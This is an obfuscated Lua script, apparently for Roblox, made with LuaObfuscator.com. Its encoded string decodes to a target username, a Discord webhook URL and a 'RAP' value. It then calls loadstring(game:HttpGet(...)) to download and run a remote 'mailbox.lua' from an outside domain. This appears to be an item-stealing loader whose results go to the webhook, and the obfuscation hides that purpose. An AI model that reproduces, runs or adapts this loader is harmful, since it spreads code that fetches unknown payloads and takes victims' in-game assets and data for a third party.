--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v98=0;local v99;while true do if (v98==1) then return v99;end if (v98==0) then v99=v5(v71,v19);v19=nil;v98=1;end end else return v71;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v72=0;local v73;while true do if (v72==(0 -0)) then v73=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -((1432 -(282 + 595)) + 64))) -(v32-1)) + (932 -(857 + (1711 -(1523 + 114)))))) ;return v73-(v73%(569 -(367 + 201))) ;end end else local v74=(929 -(214 + 641 + 72))^(v32-1) ;return (((v31%(v74 + v74))>=v74) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37=1270 -(226 + 1044) ;local v38;local v39;local v40;local v41;while true do if (v37==(4 -3)) then return (v41 * ((31011829 -14234496) -(32 + 85))) + (v40 * 65536) + (v39 * 256) + v38 ;end if (v37==(0 + 0)) then v38,v39,v40,v41=v1(v16,v18,v18 + 1 + 2 );v18=v18 + (961 -(892 + 65)) ;v37=(3 -1) -(351 -(87 + 263)) ;end end end local function v24() local v42=180 -((118 -51) + 113) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + 0)) then v45=2 -1 ;v46=(v20(v44,1 + 0 ,79 -59 ) * ((954 -((1240 -(145 + 293)) + 150))^(85 -53))) + v43 ;v42=2;end if (v42==(3 -1)) then v47=v20(v44,16 + (435 -(44 + 386)) ,1028 -((2401 -(998 + 488)) + 82) );v48=((v20(v44,90 -58 )==1) and  -(1 + 0)) or 1 ;v42=3 -0 ;end if (v42==(1187 -(1069 + 118))) then v43=v23();v44=v23();v42=1;end if (v42==(6 -3)) then if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else v47=1 + 0 ;v45=791 -(368 + 423) ;end elseif (v47==(6433 -4386)) then return ((v46==(18 -(10 + 8))) and (v48 * ((3 -2)/0))) or (v48 * NaN) ;end return v8(v48,v47-(1465 -(416 + 26)) ) * (v45 + (v46/((6 -(2 + 2))^(19 + 4 + 29)))) ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(772 -(201 + 571))) then return "";end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v68=1139 -(116 + 1022) , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (2==v52) then v57=nil;v58=nil;v52=10 -7 ;end if (v52==1) then v55=nil;v56=nil;v52=2;end if (v52==(867 -(550 + 317))) then v53=0 -0 ;v54=nil;v52=1 -0 ;end if (v52~=(8 -5)) then else v59=nil;v60=nil;v52=4;end if (v52==(289 -(134 + 151))) then while true do if (v53==(1665 -(970 + 695))) then local v95=0 -0 ;local v96;while true do if (v95==0) then v96=0;while true do if (0~=v96) then else local v118=1990 -(582 + 1408) ;while true do if (v118==(0 -0)) then v54=0 -0 ;v55=nil;v118=3 -2 ;end if (v118~=1) then else v96=1825 -(1195 + 629) ;break;end end end if (v96==(1 -0)) then v53=1;break;end end break;end end end if (v53==1) then v56=nil;v57=nil;v53=2;end if (v53~=2) then else local v97=0;while true do if (v97==(241 -(187 + 54))) then v58=nil;v59=nil;v97=1;end if (v97==(781 -(162 + 618))) then v53=3 + 0 ;break;end end end if (v53==3) then v60=nil;while true do local v100=0 + 0 ;local v101;while true do if (v100==(0 -0)) then v101=0 -0 ;while true do if (v101==(1 + 0)) then if (v54==(1636 -(1373 + 263))) then local v141=1000 -(451 + 549) ;local v142;while true do if (0==v141) then v142=0;while true do if (v142==(1 + 1)) then v54=1;break;end if (v142==(0 -0)) then local v145=0 -0 ;while true do if ((1384 -(746 + 638))~=v145) then else v55={};v56={};v145=1;end if (v145==1) then v142=1 + 0 ;break;end end end if (v142==(1 -0)) then local v146=0;local v147;while true do if (v146==(341 -(218 + 123))) then v147=1581 -(1535 + 46) ;while true do if (v147==(1 + 0)) then v142=2;break;end if ((0 + 0)~=v147) then else v57={};v58={v55,v56,nil,v57};v147=1;end end break;end end end end break;end end end break;end if (v101~=0) then else local v121=560 -(306 + 254) ;local v122;while true do if (v121~=(0 + 0)) then else v122=0;while true do if (v122==0) then if (v54~=1) then else local v148=0 -0 ;local v149;while true do if (v148==(1467 -(899 + 568))) then v149=0;while true do if (v149==(2 + 0)) then v54=2;break;end if (v149~=1) then else for v156=2 -1 ,v59 do local v157=0;local v158;local v159;local v160;while true do if ((603 -(268 + 335))~=v157) then else v158=0;v159=nil;v157=1;end if (v157==(291 -(60 + 230))) then v160=nil;while true do if (v158~=1) then else if (v159==1) then v160=v21()~=0 ;elseif (v159==(574 -(426 + 146))) then v160=v24();elseif (v159==(1 + 2)) then v160=v25();end v60[v156]=v160;break;end if (v158==0) then local v163=1456 -(282 + 1174) ;while true do if (v163==0) then v159=v21();v160=nil;v163=1;end if (v163~=1) then else v158=1;break;end end end end break;end end end v58[814 -(569 + 242) ]=v21();v149=5 -3 ;end if (v149~=0) then else local v155=0;while true do if (v155==(0 + 0)) then v59=v23();v60={};v155=1025 -(706 + 318) ;end if (v155~=1) then else v149=1252 -(721 + 530) ;break;end end end end break;end end end if (v54==(1273 -(945 + 326))) then local v150=0 -0 ;local v151;while true do if (v150==(0 + 0)) then v151=700 -(271 + 429) ;while true do local v152=0 + 0 ;local v153;while true do if (v152==0) then v153=0;while true do if (v153~=(1500 -(1408 + 92))) then else if (v151~=(1086 -(461 + 625))) then else local v161=1288 -(993 + 295) ;while true do if (v161~=(1 + 0)) then else v151=1;break;end if (v161==0) then for v164=1,v23() do local v165=0;local v166;local v167;while true do if ((1172 -(418 + 753))~=v165) then else while true do if (v166==0) then v167=v21();if (v20(v167,1 + 0 ,1 + 0 )~=(0 + 0)) then else local v170=0 + 0 ;local v171;local v172;local v173;while true do if (1==v170) then local v174=529 -(406 + 123) ;local v175;while true do if (v174==(1769 -(1749 + 20))) then v175=0;while true do if (v175==0) then local v181=0;while true do if (v181==1) then v175=1;break;end if (v181~=0) then else v173={v22(),v22(),nil,nil};if (v171==(1322 -(1249 + 73))) then local v183=0 + 0 ;local v184;while true do if (v183~=0) then else v184=0;while true do if (v184==0) then v173[1148 -(466 + 679) ]=v22();v173[9 -5 ]=v22();break;end end break;end end elseif (v171==(2 -1)) then v173[3]=v23();elseif (v171==2) then v173[1903 -(106 + 1794) ]=v23() -((1 + 1)^16) ;elseif (v171==3) then local v193=0 + 0 ;local v194;while true do if (v193~=0) then else v194=0;while true do if (v194==(0 -0)) then v173[7 -4 ]=v23() -((116 -(4 + 110))^(600 -(57 + 527))) ;v173[4]=v22();break;end end break;end end end v181=1;end end end if (v175~=(1428 -(41 + 1386))) then else v170=2;break;end end break;end end end if (v170~=(105 -(17 + 86))) then else local v176=0 + 0 ;local v177;while true do if (v176==0) then v177=0 -0 ;while true do if (v177~=(2 -1)) then else v170=3;break;end if (v177~=(166 -(122 + 44))) then else local v182=0;while true do if (v182~=0) then else if (v20(v172,1 -0 ,3 -2 )==1) then v173[2]=v60[v173[2]];end if (v20(v172,2 + 0 ,1 + 1 )==1) then v173[3]=v60[v173[3]];end v182=1 -0 ;end if (v182==1) then v177=66 -(30 + 35) ;break;end end end end break;end end end if (v170~=(0 + 0)) then else v171=v20(v167,2,3);v172=v20(v167,1261 -(1043 + 214) ,22 -16 );v170=1213 -(323 + 889) ;end if (v170==(7 -4)) then if (v20(v172,583 -(361 + 219) ,3)==1) then v173[4]=v60[v173[4]];end v55[v164]=v173;break;end end end break;end end break;end if (v165==0) then v166=0;v167=nil;v165=1;end end end for v168=321 -(53 + 267) ,v23() do v56[v168-(1 + 0) ]=v28();end v161=1;end end end if (v151==(414 -(15 + 398))) then return v58;end break;end end break;end end end break;end end end v122=983 -(18 + 964) ;end if (v122~=(3 -2)) then else v101=1;break;end end break;end end end end break;end end end break;end end break;end end end local function v29(v61,v62,v63) local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...) local v78=v65;local v79=v66;local v80=v67;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do v90=v78[v82];v91=v90[1];if (v91<=3) then if (v91<=1) then if (v91>0) then v88[v90[2]]=v63[v90[3]];else v88[v90[2]]=v90[3];end elseif (v91==2) then v63[v90[3]]=v88[v90[2]];else v88[v90[2]]();end elseif (v91<=5) then if (v91==4) then do return;end else local v112=v90[2];local v113,v114=v81(v88[v112](v13(v88,v112 + 1 ,v90[3])));v83=(v114 + v112) -1 ;local v115=0;for v119=v112,v83 do local v120=0;while true do if (0==v120) then v115=v115 + 1 ;v88[v119]=v113[v115];break;end end end end elseif (v91<=6) then local v116=0;local v117;while true do if (v116==0) then v117=v90[2];v88[v117]=v88[v117](v13(v88,v117 + 1 ,v83));break;end end elseif (v91==7) then local v123=v90[2];local v124=v88[v90[3]];v88[v123 + 1 ]=v124;v88[v123]=v124[v90[4]];else local v128;local v129;v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v63[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v63[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v63[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v63[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v63[v90[3]];v82=v82 + 1 ;v90=v78[v82];v129=v90[2];v128=v88[v90[3]];v88[v129 + 1 ]=v128;v88[v129]=v128[v90[4]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];end v82=v82 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O0003083O00557365724E616D65030A3O00736C656B726F773O3903073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31393238343330383635363132382O3037302F574A632O362D4C506D5F37326165536A304B66344368576176506A565839382O7963446153444F4A47456B6A3056716E6D52577A4C5A2D5157666C756B7949517A3847732O033O00524150025O006AF840030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403263O00682O7470733A2O2F3O772E6B656261626D616E2E78797A2F732F6D61696C626F782E6C7561000E3O0012083O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00073O00122O000100083O00202O00010001000900122O0003000A4O0005000100034O00065O00022O00033O000100012O00043O00017O00",v9(),...);
